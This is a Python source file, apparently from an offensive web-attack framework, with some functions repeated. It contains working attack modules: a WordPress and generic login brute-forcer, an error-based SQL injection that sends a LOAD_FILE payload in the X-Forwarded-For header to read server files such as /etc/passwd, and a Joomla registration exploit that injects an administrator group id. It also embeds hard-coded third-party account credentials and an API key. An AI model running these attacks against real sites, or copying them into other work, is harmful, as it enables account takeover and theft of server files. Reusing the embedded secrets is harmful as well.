def run(self, frmwk, args):
    """Configure the generic ``attack/web_bruter`` module for a WordPress login form and run it.

    Every option registered on the bruter is seeded from this module's own
    ``options``/``advanced_options``; the POST body template and the
    success-marker string are the only WordPress-specific parts.

    Args:
        frmwk: framework object providing ``print_status``, ``modules`` and
            ``reload_module``.
        args: unused here.
    """
    module_name = 'attack/web_bruter'
    frmwk.print_status('Init paprams!')
    # Throw-away request object; it is only used to obtain the cookie
    # header that is handed to the bruter below.
    victim = HTTP(self.options['URL'], timeout=self.advanced_options['TIMEOUT'])
    victim.storecookie = True
    checktype = 'successstr'
    # Marker string that identifies a successful login response.
    tokenstr = 'no-unread-messages'
    # __USER__ / __PASS__ are placeholders, presumably substituted per
    # attempt by the bruter's worker (not visible here).
    param = 'log=__USER__&pwd=__PASS__&wp-submit=Log+In&redirect_to=' + quote_plus(self.options['URL']) + '&testcookie=1'
    frmwk.print_status('Start bruteforcer!')
    bruter = frmwk.modules[module_name]
    bruter.options.addString('URL', 'Link login', default=self.options['URL'])
    bruter.options.addString('USERNAME', 'Account login', default=self.options['USERNAME'])
    bruter.options.addString('PASSWORD', 'Password login', default=self.options['PASSWORD'])
    bruter.options.addString('DATA', 'Date with POST method', default=param)
    bruter.options.addString('CHECKTYPE', 'Type of checker success login', default=checktype)
    bruter.options.addString('TOKEN', 'Error string', default=tokenstr)
    # NOTE(review): THREADS reuses the DATA help text, and the USERLIST /
    # PASSLIST help texts are swapped; the option names themselves are right.
    bruter.options.addInteger('THREADS', 'Date with POST method', default=self.options['THREADS'])
    bruter.options.addPath('USERLIST', 'passwords to test', default=self.options['USERLIST'])
    bruter.options.addPath('PASSLIST', 'usernames to test', default=self.options['PASSLIST'])
    bruter.options.addBoolean('VERBOSE', 'Verbose', default=self.options['VERBOSE'])
    # NOTE(review): victim.headers['Cookie'] raises KeyError unless HTTP
    # pre-populates that header — confirm against the HTTP class.
    bruter.advanced_options.addString('COOKIE', 'Cookie', default=victim.headers['Cookie'] if victim.headers['Cookie'] else None)
    bruter.advanced_options.addInteger('DELAY', 'Delay time', default=self.advanced_options['DELAY'])
    bruter.advanced_options.addInteger('TIMEOUT', 'Time out request', default=self.advanced_options['TIMEOUT'])
    bruter.advanced_options.addBoolean('STOP', 'Stop scanning', default=True)
    bruter.run(frmwk, None)
    # Presumably discards the options registered above so the shared
    # module instance starts clean for the next caller.
    frmwk.reload_module(module_name)
def Whoiswebhosting(self, searcher):
    """Scrape the whois.webhosting.info reverse-IP listing for ``self.ip``.

    ``searcher['URL']`` is a format template taking ``(ip, page_number)``.
    Page 1 is fetched first; the "Last >>" pagination link on it yields the
    highest page index.  Further pages are then fetched in order until the
    range is exhausted or the site answers with its anti-automation check.
    Collected domains are appended to ``self.domains`` and a per-site count
    is printed through ``self.fmt_string``.
    """
    req = HTTP(searcher['URL'])
    urls = []
    data = req.Request(searcher['URL'] % (self.ip, 1))
    # The "Last >>" link carries the highest page index as ?pi=N.
    last = search(
        r'\?pi=([0-9]+)\&ob=SLD\&oo=DESC">\ \;\ \;Last\ \;>\>\;<\/a>', data)
    url = findall(
        r'<td><a href="http:\/\/whois\.webhosting\.info\/.*?\.">(.*?)\.<\/a><\/td>', data)
    urls += url
    if last:
        page = last.group(1)
        # NOTE(review): range() is half-open, so the page numbered ``page``
        # itself is never requested.
        for i in range(2, int(page)):
            data = req.Request(searcher['URL'] % (self.ip, i))
            # The site's anti-automation interstitial: stop instead of
            # parsing a page with no listing on it.
            if search('The security key helps us prevent automated searches', data):
                break
            url = findall(
                r'<td><a href="http:\/\/whois\.webhosting\.info\/.*?\.">(.*?)\.<\/a><\/td>', data)
            urls += url
        self.frmwk.print_status(
            self.fmt_string.format(searcher['SITE'], urls.__len__()))
        self.domains += urls
    else:
        # Single page only: same reporting as the paginated branch.
        self.frmwk.print_status(
            self.fmt_string.format(searcher['SITE'], urls.__len__()))
        self.domains += urls
def run(self, frmwk, args):
    """Configure the generic ``attack/web_bruter`` module for a WordPress login form and run it.

    Every option registered on the bruter is seeded from this module's own
    ``options``/``advanced_options``; the POST body template and the
    success-marker string are the only WordPress-specific parts.

    Args:
        frmwk: framework object providing ``print_status``, ``modules`` and
            ``reload_module``.
        args: unused here.
    """
    module_name = 'attack/web_bruter'
    frmwk.print_status('Init paprams!')
    # Throw-away request object; it is only used to obtain the cookie
    # header that is handed to the bruter below.
    victim = HTTP(self.options['URL'], timeout=self.advanced_options['TIMEOUT'])
    victim.storecookie = True
    checktype = 'successstr'
    # Marker string that identifies a successful login response.
    tokenstr = 'no-unread-messages'
    # __USER__ / __PASS__ are placeholders, presumably substituted per
    # attempt by the bruter's worker (not visible here).
    param = 'log=__USER__&pwd=__PASS__&wp-submit=Log+In&redirect_to=' + quote_plus(
        self.options['URL']) + '&testcookie=1'
    frmwk.print_status('Start bruteforcer!')
    bruter = frmwk.modules[module_name]
    bruter.options.addString('URL', 'Link login', default=self.options['URL'])
    bruter.options.addString('USERNAME', 'Account login', default=self.options['USERNAME'])
    bruter.options.addString('PASSWORD', 'Password login', default=self.options['PASSWORD'])
    bruter.options.addString('DATA', 'Date with POST method', default=param)
    bruter.options.addString('CHECKTYPE', 'Type of checker success login', default=checktype)
    bruter.options.addString('TOKEN', 'Error string', default=tokenstr)
    # NOTE(review): THREADS reuses the DATA help text, and the USERLIST /
    # PASSLIST help texts are swapped; the option names themselves are right.
    bruter.options.addInteger('THREADS', 'Date with POST method', default=self.options['THREADS'])
    bruter.options.addPath('USERLIST', 'passwords to test', default=self.options['USERLIST'])
    bruter.options.addPath('PASSLIST', 'usernames to test', default=self.options['PASSLIST'])
    bruter.options.addBoolean('VERBOSE', 'Verbose', default=self.options['VERBOSE'])
    # NOTE(review): victim.headers['Cookie'] raises KeyError unless HTTP
    # pre-populates that header — confirm against the HTTP class.
    bruter.advanced_options.addString('COOKIE', 'Cookie', default=victim.headers['Cookie'] if victim.headers['Cookie'] else None)
    bruter.advanced_options.addInteger(
        'DELAY', 'Delay time', default=self.advanced_options['DELAY'])
    bruter.advanced_options.addInteger(
        'TIMEOUT', 'Time out request', default=self.advanced_options['TIMEOUT'])
    bruter.advanced_options.addBoolean('STOP', 'Stop scanning', default=True)
    bruter.run(frmwk, None)
    # Presumably discards the options registered above so the shared
    # module instance starts clean for the next caller.
    frmwk.reload_module(module_name)
def __init__(self, host, keyworld, limit, delay):
    """Set up one search worker thread.

    Args:
        host: base URL handed to the ``HTTP`` client.
        keyworld: raw search keyword; stored URL-quoted.
        limit: offset at which paging stops (compared against ``count``
            by the thread's ``run`` loop).
        delay: seconds to pause between pages.
    """
    super().__init__()
    # Paging state: current offset, parsed rows so far, rows per page.
    self.count, self.info, self.step = 0, [], 10
    self.limit, self.delay = limit, delay
    self.keyworld = quote_plus(keyworld)
    self.request = HTTP(host, CONFIG.TIME_OUT, user_agents_type='bot')
def eWhois(self, searcher):
    """Download the ewhois.com reverse-IP export for ``self.ip``.

    Logs in first with the credentials embedded below (the session cookie
    is presumably retained on the request object via ``storecookie``), then
    fetches the export page and extracts the first quoted column of each
    row.  Results are appended to ``self.domains``.
    """
    # NOTE(review): hard-coded third-party account credentials live in
    # source; they belong in configuration (cf. CONFIG used elsewhere in
    # this tree) and should be rotated if the account is still live.
    params = urlencode({'_method':'POST','data[User][email]':'*****@*****.**','data[User][password]':'RitX:::R1tX','data[User][remember_me]':'0'})
    req = HTTP("http://www.ewhois.com/")
    req.storecookie = True
    req.rand_useragent = False
    # The login response body is discarded; only its cookie matters.
    data = req.Request('http://www.ewhois.com/login/', 'POST', params)
    data = req.Request("http://www.ewhois.com/export/ip-address/%s/" % self.ip)
    # Export rows look CSV-like (judging by the pattern); capture column 1.
    urls = findall(r'"(.*?)","","","[UA\-[0-9]+\-[0-9]+|]",""',data)
    self.frmwk.print_status(self.fmt_string.format(searcher['SITE'],urls.__len__()))
    self.domains += urls
def BingApi(self, searcher):
    """Query the Bing search API about ``self.ip`` and collect result hostnames.

    ``searcher['URL']`` is a format template taking ``(api_key, ip, page)``.
    The first response's ``<web:Total>`` count decides how many further
    pages (50 results each) are requested; all pages' XML is concatenated
    before the ``<web:Url>`` elements are extracted.  Results go to
    ``self.domains``.
    """
    # NOTE(review): hard-coded API key checked into source — should come
    # from configuration (cf. CONFIG elsewhere in this tree) and be rotated
    # if it was ever live.
    KEY = "49EB4B94127F7C7836C96DEB3F2CD8A6D12BDB71"
    req = HTTP(searcher['URL'])
    data = req.Request(searcher['URL'] % (KEY, self.ip, 0))
    # NOTE(review): .group(1) on a None match (e.g. an API error body)
    # raises AttributeError here.
    total = search('<web:Total>([0-9]+)<\/web:Total>', data).group(1)
    page = int(int(total) / 50 + 1)
    for i in range(1, page):
        data += req.Request(searcher['URL'] % (KEY, self.ip, i))
    result = findall(r'<web:Url>(.+?)<\/web:Url>', data)
    urls = []
    for url in result:
        # Keep only the host component of scheme://host/path.
        urls.append(url.split('/', 3)[2])
    self.frmwk.print_status(
        self.fmt_string.format(searcher['SITE'], urls.__len__()))
    self.domains += urls
class Module(Templates):
    """Error-based SQL injection probe carried in the ``X-Forwarded-For`` header.

    The request body is a fixed login POST; the header value embeds a MySQL
    ``LOAD_FILE`` read of ``options['FILE']`` and depends on the server
    echoing a duplicate-key error back to the client.  Each loop iteration
    moves a 62-character window through the file and writes the recovered
    fragment to stdout until no such error is returned.

    Defender notes: the two conditions this relies on are a forwarded-for
    value reaching SQL unparameterised and verbose database errors reaching
    the response; on the wire it shows as SQL syntax inside the
    X-Forwarded-For header and "Duplicate entry" text in the response.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.version = 1
        self.author = ['Kid']
        # NOTE(review): both description strings are template leftovers and
        # do not describe what run() does.
        self.description = 'Get Basic Meter Information By Reading Tables'
        self.detailed_description = 'This module retreives some basic meter information and displays it in a human-readable way.'
        self.options.addString('FILE', 'domain/ip', default='/etc/passwd')

    def run(self, frmwk, args):
        """Read ``options['FILE']`` in 62-character chunks via the injected header and echo it to stdout.

        Args:
            frmwk: framework object (unused in this method).
            args: unused.
        """
        # NOTE(review): hard-coded URL with no option to override it —
        # presumably a placeholder left from development.
        url = 'http://www.google.com/'
        self.victim = HTTP(url)
        # NOTE(review): ``len`` shadows the builtin; it is the 1-based
        # substring offset used in the payload below.
        len = 1
        while True:
            header = {'x-forwarded-for': "1' order by (SELECT 1 from (select count(*),concat(floor(rand(0)*2),(substring((select(LOAD_FILE('%s'))),%s,62)))a from information_schema.tables group by a)b);-- -'" % (self.options['FILE'], len)}
            data = self.victim.Request(url, 'POST', "uname=administrator&upass=12345612345&Submit=+++Login+++", header=header)
            # The file fragment arrives inside the duplicate-key error text;
            # the leading character is the rand() digit and is skipped.
            res = search("Duplicate entry '.(.*?)' for key ", data, DOTALL)
            if res:
                stdout.write(res.group(1))
                stdout.flush()
            else:
                # No error in the response: end of file, or not vulnerable.
                break
            len += 62
def Filter(domain, infos, type):
    """Extract in-scope subdomains and e-mail addresses from search results.

    Each entry of ``infos`` is a dict with at least ``'url'`` and ``'data'``
    (both possibly URL-encoded).  Candidates are taken from the URL and the
    snippet; when an entry yields at least ``type`` distinct domains or
    e-mails, the page behind ``'url'`` is fetched too and mined the same
    way, followed by a 2-second pause.  Fetch/parse failures on that extra
    page are deliberately ignored so one dead link does not abort the run.

    Args:
        domain: scope domain handed to the ``*_filter`` / ``real*`` helpers.
        infos: list of result dicts; ``'data'`` is rewritten in place
            (URL-unquoted).
        type: hit threshold that triggers fetching the page itself.

    Returns:
        ``(subs, emails)`` — two lists in processing order; duplicates are
        removed per entry, not across entries.
    """
    req = HTTP('https://docs.google.com/')
    subs, emails, checked = [], [], []
    total = len(infos)

    def unique(seq):
        # Per-entry dedupe; sorting keeps the output order deterministic.
        return sorted(set(seq))

    for index, entry in enumerate(infos, start=1):
        print_process(int(index * 100 / total))
        if entry in checked:
            continue
        entry['data'] = unquote(entry['data'])
        found_domains = domain_filter(domain, unquote(entry['url']))
        found_domains += domain_filter(domain, entry['data'])
        found_emails = email_filter(domain, entry['data'])
        found_domains = unique(realdomain(found_domains))
        found_emails = unique(realemail(found_emails))
        if len(found_domains) >= type or len(found_emails) >= type:
            try:
                page = getLink(req, entry['url'])
                found_domains += domain_filter(domain, page)
                found_emails += email_filter(domain, page)
            except Exception:
                pass  # best-effort: keep what the snippet already gave us
            sleep(2)
        subs.extend(unique(realdomain(found_domains)))
        emails.extend(unique(realemail(found_emails)))
        checked.append(entry)
    print_line('')
    return (subs, emails)
def reverseip(self, searcher):
    """Run one reverse-IP source described by the ``searcher`` dict.

    A searcher with an ``'SP'`` entry is delegated entirely to that callable.
    Otherwise ``'URL'`` is requested (as a POST with ``'DATA' % ip`` when a
    body template is present, else as a GET with ``'URL' % ip``), the
    ``'REGEX'`` pattern is applied to the response, and the matches are
    appended to ``self.domains`` with a per-site count printed.

    Any exception is swallowed so a failing source does not stop the others.
    """
    try:
        if 'SP' in searcher:
            searcher['SP'](searcher)
            return
        req = HTTP(searcher['URL'])
        if 'DATA' in searcher:
            body = searcher['DATA'] % self.ip
            data = req.Request(searcher['URL'], 'POST', body)
        else:
            data = req.Request(searcher['URL'] % self.ip)
        urls = findall(searcher['REGEX'], data)
        self.frmwk.print_status(
            self.fmt_string.format(searcher['SITE'], len(urls)))
        self.domains += urls
    except Exception:
        # Deliberate best-effort: errors from a single source are not
        # reported, which also hides bad REGEX/URL templates.
        pass
def run(self, frmwk, args):
    """Read ``options['FILE']`` in 62-character chunks through an error-based SQL injection in ``X-Forwarded-For`` and echo it to stdout.

    The request body is a fixed login POST; the header value embeds a MySQL
    ``LOAD_FILE`` read and depends on the server echoing a duplicate-key
    error.  Each iteration advances the substring offset by 62 until no
    such error comes back.  On the wire this shows as SQL syntax inside the
    X-Forwarded-For header and "Duplicate entry" text in the response.

    Args:
        frmwk: framework object (unused in this method).
        args: unused.
    """
    # NOTE(review): hard-coded URL with no option to override it —
    # presumably a placeholder left from development.
    url = 'http://www.google.com/'
    self.victim = HTTP(url)
    # NOTE(review): ``len`` shadows the builtin; it is the 1-based
    # substring offset used in the payload below.
    len = 1
    while True:
        header = {'x-forwarded-for': "1' order by (SELECT 1 from (select count(*),concat(floor(rand(0)*2),(substring((select(LOAD_FILE('%s'))),%s,62)))a from information_schema.tables group by a)b);-- -'" % (self.options['FILE'], len)}
        data = self.victim.Request(url, 'POST', "uname=administrator&upass=12345612345&Submit=+++Login+++", header=header)
        # The file fragment arrives inside the duplicate-key error text;
        # the leading character is the rand() digit and is skipped.
        res = search("Duplicate entry '.(.*?)' for key ", data, DOTALL)
        if res:
            stdout.write(res.group(1))
            stdout.flush()
        else:
            # No error in the response: end of file, or not vulnerable.
            break
        len += 62
def run(self, frmwk, args):
    """Drive the generic login brute-forcer: build the credential lists, fan out worker threads, report hits.

    Usernames come from ``USERNAME`` (comma-separated) or ``USERLIST``
    (file); passwords from ``PASSWORD`` or ``PASSLIST`` likewise.  The
    actual attempts are made by ``self.worker`` (defined elsewhere), which
    presumably reads ``self.userlist``/``self.passlist``/``self.temppass``
    and appends ``(user, password)`` pairs to ``self.success``.

    Args:
        frmwk: framework object used for output.
        args: unused.
    """
    self.frmwk = frmwk
    self.victim = HTTP(self.options['URL'], timeout=self.advanced_options['TIMEOUT'])
    self.victim.storecookie = True
    self.verbose = self.options['VERBOSE']
    self.userlist = []
    self.passlist = []
    self.success = []
    # Optional fixed cookie supplied by the caller (e.g. a CMS wrapper).
    self.victim.headers.update({'Cookie': self.advanced_options['COOKIE']} if self.advanced_options['COOKIE'] else {})
    if self.options['USERNAME']:
        self.userlist = self.options['USERNAME'].split(',')
    else:
        self.userlist = ReadFromFile(FullPath(self.options['USERLIST']))
    if self.options['PASSWORD']:
        self.passlist = self.options['PASSWORD'].split(',')
    else:
        for a in ReadFromFile(FullPath(self.options['PASSLIST'])):
            self.passlist.append(a)
    self.lenuser = len(self.userlist)
    self.lenpass = len(self.passlist)
    listthread = []
    if len(self.userlist) > 0:
        self.temppass = []
        for i in range(self.options['THREADS']):
            t = Thread(target=self.worker)
            listthread.append(t)
            t.start()
        try:
            for t in listthread:
                t.join()
        except KeyboardInterrupt:
            # NOTE(review): threading.Thread has no terminate(), so this
            # raises AttributeError on Ctrl-C; isAlive() was also removed
            # in Python 3.9 (use is_alive()).
            for t in listthread:
                if t.isAlive():
                    t.terminate()
            pass
    self.success = sorted(self.success)
    self.frmwk.print_line()
    self.frmwk.print_status("List login:\n-----------")
    if len(self.success) > 0:
        for u, p in self.success:
            self.frmwk.print_success(
                'SUCCESS: username: {0:<20} password: {1}'.format(
                    u, p))
        self.frmwk.print_status("-----------")
    else:
        self.frmwk.print_status('Nothing to do!')
def run(self, frmwk, args):
    """Configure the generic ``attack/web_bruter`` module from this module's options, hook in ``self.initer``, and run it.

    Unlike the WordPress wrapper, no POST template is given here
    (``DATA`` defaults to ``''``) and no cookie is pre-fetched; presumably
    ``self.initer`` (assigned as ``initcallbacker``, defined elsewhere)
    fills those in per target.  Successful pairs are copied to
    ``self.login`` afterwards.

    Args:
        frmwk: framework object providing ``print_status``, ``modules`` and
            ``reload_module``.
        args: unused here.
    """
    self.frmwk = frmwk
    self.module_name = 'attack/web_bruter'
    checktype = 'successstr'
    # Marker string that identifies a successful login response.
    tokenstr = 'no-unread-messages'
    self.frmwk.print_status('Init paprams!')
    self.victim = HTTP(self.options['URL'], timeout=self.advanced_options['TIMEOUT'])
    self.victim.storecookie = True
    self.frmwk.print_status('Start bruteforcer!')
    brute = self.frmwk.modules[self.module_name]
    brute.options.addString('URL', 'Link login', default=self.options['URL'])
    brute.options.addString('USERNAME', 'Account login', default=self.options['USERNAME'])
    brute.options.addString('PASSWORD', 'Password login', default=self.options['PASSWORD'])
    brute.options.addString('DATA', 'Date with POST method', default='')
    brute.options.addString('CHECKTYPE', 'Type of checker success login', default=checktype)
    brute.options.addString('TOKEN', 'Error string', default=tokenstr)
    # NOTE(review): THREADS reuses the DATA help text, and the USERLIST /
    # PASSLIST help texts are swapped; the option names themselves are right.
    brute.options.addInteger('THREADS', 'Date with POST method', default=self.options['THREADS'])
    brute.options.addPath('USERLIST', 'passwords to test', default=self.options['USERLIST'])
    brute.options.addPath('PASSLIST', 'usernames to test', default=self.options['PASSLIST'])
    brute.options.addBoolean('VERBOSE', 'Verbose', default=self.options['VERBOSE'])
    brute.advanced_options.addString('COOKIE', 'Cookie', default=None)
    brute.advanced_options.addInteger(
        'DELAY', 'Delay time', default=self.advanced_options['DELAY'])
    brute.advanced_options.addInteger(
        'TIMEOUT', 'Time out request', default=self.advanced_options['TIMEOUT'])
    brute.advanced_options.addBoolean('STOP', 'Stop scanning', default=True)
    brute.initcallbacker = self.initer
    brute.run(self.frmwk, None)
    self.login = brute.success
    # Presumably discards the options registered above so the shared
    # module instance starts clean for the next caller.
    self.frmwk.reload_module(self.module_name)
class Searcher(Thread):
    """Base thread for paging through a search engine's results for one keyword.

    Subclasses are expected to supply ``uriCreater()``, ``Has_Next(data)``,
    ``Getdata(data)`` and ``Spliter(row)`` (none are defined here).  The
    thread keeps a result offset in ``count``, advances it by ``step`` (the
    number of rows parsed from the last page) and stops at ``limit``.
    Parsed rows accumulate in ``info``.
    """

    def __init__(self, host, keyworld, limit, delay):
        super().__init__()
        self.keyworld = quote_plus(keyworld)
        self.limit = limit
        self.delay = delay
        self.request = HTTP(host, CONFIG.TIME_OUT, user_agents_type='bot')
        # Paging state: current offset, parsed rows so far, rows per page.
        self.count = 0
        self.info = []
        self.step = 10

    def run(self):
        """Fetch pages until the subclass reports no next page, the limit is hit, or a page yields nothing."""
        while True:
            printer.print_line('\t{0:<25} {1:d}'.format(self.name, self.count))
            uri = self.uriCreater()
            if not self.Has_Next(self.do_search(uri)):
                break
            # NOTE(review): count starts at 0, so this guard ends the loop
            # right after the first page unless a subclass changes count —
            # verify whether step was meant here.
            if self.count <= 1:
                break
            self.count += self.step
            if self.count >= self.limit:
                break
            sleep(self.delay)

    def do_search(self, uri):
        """Request one page, parse it with ``Getdata`` and feed the rows to ``do_split``.

        Returns the raw page text, ``''`` when ``Getdata`` fails, and
        ``None`` when the request itself returned an empty string.
        """
        data = self.request.Request(uri)
        if data != '':
            try:
                info = self.Getdata(data)
            except Exception as e:
                printer.print_error('%s : Nothing to do !' % self.name)
                pass
                return ''
            self.do_split(info)
        return data

    def do_split(self, info):
        """Run ``Spliter`` over each raw row, keep the successes, and set ``step`` to how many there were."""
        ifl = []
        for i in info:
            try:
                ifl.append(self.Spliter(i.strip()))
            except Exception as e:
                # A malformed row is reported and skipped, not fatal.
                printer.print_error('%s Error : %s\ncontent: %s' % (self.name, e, i))
                pass
        self.info += ifl
        self.step = len(ifl)
def run(self, frmwk, args):
    """Register a user through a Joomla ``com_users`` registration form with an injected ``jform[groups][]`` value, then try to activate it by mail.

    Flow: load the form to pick up its CSRF token, send a throw-away
    registration, send the real one built from ``self.username`` /
    ``self.password`` and the configured Gmail address, report the page's
    warning/message block, wait 30 s, then look for an activation link in
    the mailbox (``self.getMail``, defined elsewhere) and follow it.

    Defender notes: the indicator is a registration POST carrying a
    ``jform[groups][]`` field, which the stock form does not send; keeping
    Joomla current and not trusting client-supplied group ids closes it.

    Args:
        frmwk: framework object used for output.
        args: unused.
    """
    url = self.options['URL']
    email = CONFIG.GMAIL_ACCOUNT[0]
    self.username = '******' + str(randint(1000,100000))
    self.password = '******'
    victim = HTTP(url)
    victim.storecookie = True
    # Fixed dummy registration sent first; the real one follows.
    exploit = 'jform%5Bname%5D=exploit&jform%5Busername%5D=exploit&jform%5Bpassword1%5D=123123&jform%5Bpassword2%5D=1231233&jform%5Bemail1%5D=pentest%40yahoo.com&jform%5Bemail2%5D=pentest%40yahoo.com&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&'
    registry = 'jform%5Bname%5D={0}&jform%5Busername%5D={0}&jform%5Bpassword1%5D={1}&jform%5Bpassword2%5D={1}&jform%5Bemail1%5D={2}&jform%5Bemail2%5D={2}&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&'.format(self.username, self.password, email)
    frmwk.print_status('Init token')
    data = victim.Request(url)
    # Joomla's CSRF token is a 32-char hidden field with value="1".
    token = search('name="([a-zA-Z0-9]{32})"\svalue="1"', data)
    if token:
        token = token.group(1)
    else:
        token = ''
    frmwk.print_status('Send false request')
    url = url + '?task=registration.register'
    victim.Request(url, 'POST', exploit + token + '=1')
    frmwk.print_status('Send exploit request')
    data = victim.Request(url, 'POST', registry + token + '=1')
    warning = search('class="warning\smessage">(.*?)</dd>', data, DOTALL)
    message = search('class="message\smessage">(.*?)</dd>', data, DOTALL)
    if warning:
        frmwk.print_error('Error during exploit : ' + warning.group(1))
        return
    elif message:
        frmwk.print_success('Successful : ' + message.group(1).strip())
        frmwk.print_success('Account login: %s | %s' % (self.username, self.password))
    else:
        frmwk.print_status('Hên xui !')
    frmwk.print_status('Sleep 30s for mail receiver !')
    sleep(30)
    for email in self.getMail():
        active = search('(http(.*?)activate&token=(.*?))\s', email['body'], DOTALL)
        if active:
            active_link = active.group(1)
            frmwk.print_status('Active link: ' + active_link)
            break
    # NOTE(review): active_link is only bound inside the loop above, so
    # this raises UnboundLocalError when no mail matched.
    if active_link:
        data = victim.Request(active_link)
        message = search('class="message\smessage">(.*?)</dd>', data, DOTALL)
        if message:
            frmwk.print_success('Actived \nAccount: %s | %s' % (self.username, self.password))
def eWhois(self, searcher):
    """Download the ewhois.com reverse-IP export for ``self.ip``.

    Logs in first with the credentials embedded below (the session cookie
    is presumably retained on the request object via ``storecookie``), then
    fetches the export page and extracts the first quoted column of each
    row.  Results are appended to ``self.domains``.
    """
    # NOTE(review): hard-coded third-party account credentials live in
    # source; they belong in configuration (cf. CONFIG used elsewhere in
    # this tree) and should be rotated if the account is still live.
    params = urlencode({
        '_method': 'POST',
        'data[User][email]': '*****@*****.**',
        'data[User][password]': 'RitX:::R1tX',
        'data[User][remember_me]': '0'
    })
    req = HTTP("http://www.ewhois.com/")
    req.storecookie = True
    req.rand_useragent = False
    # The login response body is discarded; only its cookie matters.
    data = req.Request('http://www.ewhois.com/login/', 'POST', params)
    data = req.Request("http://www.ewhois.com/export/ip-address/%s/" % self.ip)
    # Export rows look CSV-like (judging by the pattern); capture column 1.
    urls = findall(r'"(.*?)","","","[UA\-[0-9]+\-[0-9]+|]",""', data)
    self.frmwk.print_status(
        self.fmt_string.format(searcher['SITE'], urls.__len__()))
    self.domains += urls
def worker(self, c_conn, c_addr):
    """Relay one client HTTP request through a chosen tunnel endpoint.

    Flow: pick a tunnel (``choin_tunnel``), parse the absolute-form target
    from the client's request line, rebuild the headers with
    ``Connection: close`` and without ``Proxy-*`` headers, send a tunnel
    parameter block (``send_init``) followed by the request inside a single
    POST to the tunnel, then stream the tunnel's response chunks back to
    the client.  With ``self.encrypt`` set, payload bytes pass through the
    ``crypton`` helper (strength unknown from here) in both directions.

    Observable shape: every relayed request becomes one POST to the tunnel
    URL whose Content-Length is init block + rebuilt headers + body.

    Args:
        c_conn: accepted client socket (recv/send/close).
        c_addr: client address, used only for log lines.

    Returns:
        None; returns early on tunnel or request-parse failure.
    """
    self.frmwk.print_status("Accept new connect from " + str(c_addr))
    # --- connect tunnel ---
    c_tunnel = self.choin_tunnel()  # pick one tunnel
    t_conn = HTTP(c_tunnel[0], timeout=self.connect_timout)
    # NOTE(review): HTTP(...) is presumably always truthy unless the class
    # defines __bool__/__len__, so this check likely never fires — confirm.
    if not t_conn:
        self.frmwk.print_error("Can't connect to tunnel")
        return None
    # --- encrypt/decrypt init ---
    if self.encrypt:
        crypt = crypton(c_tunnel[2])
    else:
        crypt = None
    # --- read the client's request line and headers ---
    c_status, c_headers, c_content_len = self.socket_receiver(c_conn)
    s_https = 0
    host = c_status[1]
    if host.startswith(b"http"):
        parser = parse.urlparse(host)
        s_host = parser.hostname
        s_port = parser.port
        s_path = b"/" + host.split(b"/", 3)[3]
        # NOTE(review): host is bytes (see the b"http" check above), so
        # parser.scheme is bytes too and never equals the str "https";
        # https targets therefore get port 80 and s_https = 0.
        if not s_port:
            if parser.scheme == "https":
                s_port = 443
            else:
                s_port = 80
        if parser.scheme == "https":
            s_https = 1
    else:
        # Only absolute-form targets are handled (no CONNECT, no origin-form).
        self.frmwk.print_error("Unknown client request connect !")
        return None
    # Request line for the origin server: method, path, version.
    c_send_header = [b" ".join([c_status[0], s_path, c_status[2]])]
    c_headers.update({b"Connection": b"close"})  # avoid keep-alive delays
    for k, v in c_headers.items():
        if k.startswith(b"Proxy"):
            continue
        c_send_header.append(k + b": " + v)
    c_send_header = b"\r\n".join(c_send_header) + b"\r\n\r\n"
    # Tunnel parameter block (format defined by send_init, not visible here).
    c_send_init = self.send_init(s_host, s_port, self.r_buffer, self.s_buffer, s_https, c_tunnel, crypt)
    t_conn.init(c_tunnel[0], "POST", {"Content-Length": len(c_send_init) + len(c_send_header) + c_content_len})
    t_conn.send(c_send_init)
    del c_send_init  # drop the local reference only
    # --- forward the client body in r_buffer-sized pieces ---
    if c_content_len > 0:
        c_sent = 0
        if self.encrypt:
            # Pad the header with the first mod_len body bytes so the
            # encrypted stream stays aligned to the key length.
            mod_len = len(c_send_header) % len(c_tunnel[2])
            data = c_conn.recv(mod_len)
            data = c_send_header + data
            data_len = len(data)
            # NOTE(review): the slice end ``data_len - i`` shrinks as i
            # grows; ``data_len`` alone looks intended — confirm.
            for i in range(0, data_len, self.r_buffer):
                t_conn.send(crypt.vc_encrypt(data[i : min(i + self.r_buffer, data_len - i)]))
            c_sent = mod_len
        else:
            t_conn.send(c_send_header)
        if c_sent < c_content_len:
            while True:
                data = c_conn.recv(min(self.r_buffer, c_content_len - c_sent))
                if self.encrypt:
                    t_conn.send(crypt.vc_encrypt(data))
                else:
                    t_conn.send(data)
                c_sent += len(data)
                # NOTE(review): ``content_lent`` is not defined anywhere in
                # this function (NameError); ``c_content_len`` is the
                # variable in scope.
                if not data or c_sent == content_lent:
                    break
    else:
        if self.encrypt:
            t_conn.send(crypt.vc_encrypt(c_send_header))
        else:
            t_conn.send(c_send_header)
    del c_send_header  # drop the local reference only
    # --- stream the response back ---
    try:
        for res_chunk in t_conn.recv(self.s_buffer):
            if self.encrypt:
                c_conn.send(crypt.vc_decrypt(res_chunk))
            else:
                c_conn.send(res_chunk)
    except Exception as e:
        self.frmwk.print_error(str(e))
    finally:
        t_conn.request.close()
        c_conn.close()
        self.frmwk.print_status("Closed connect from " + str(c_addr))
def run(self, frmwk, args):
    """Estimate a Joomla installation's version from the contents of well-known static files.

    For each ``(path, [[marker, version_range], ...])`` entry the file is
    fetched and the first marker found in a 200 response fixes
    ``self.version``.  If nothing matched, ``language/en-GB/en-GB.xml`` and
    ``components/com_mailto/mailto.xml`` are tried for a ``<version>``
    element.  The result is printed; ``self.version`` stays ``None`` when
    no file gave an answer.

    Defender note: the fingerprint files below (``htaccess.txt``,
    ``configuration.php-dist``, language ``.ini``/``.xml`` files) are
    installation leftovers; removing or blocking them removes the signal.

    Args:
        frmwk: framework object used for output.
        args: unused.
    """
    self.version = None
    url = self.options['URL']
    if not url.endswith('/'):
        url += '/'
    # Marker table taken from http://www.pepelux.org/programs/joomlascan/
    # Each marker is an SVN revision/timestamp string or a phrase that
    # appears only in a given release range.
    storeversion = [
        [
            'language/en-GB/en-GB.ini',
            [
                ['version 1.5.x 2005-10-30 14:10:00', '1.5.0.Beta-1.5.0.Beta'],
                ['9913 2008-01-09 21:28:35Z', '1.5.0.Stable-1.5.0.Stable'],
                ['9990 2008-02-05 21:54:06Z', '1.5.1.Stable-1.5.1.Stable'],
                ['10053 2008-02-21 18:57:54Z', '1.5.2.Stable-1.5.2.Stable'],
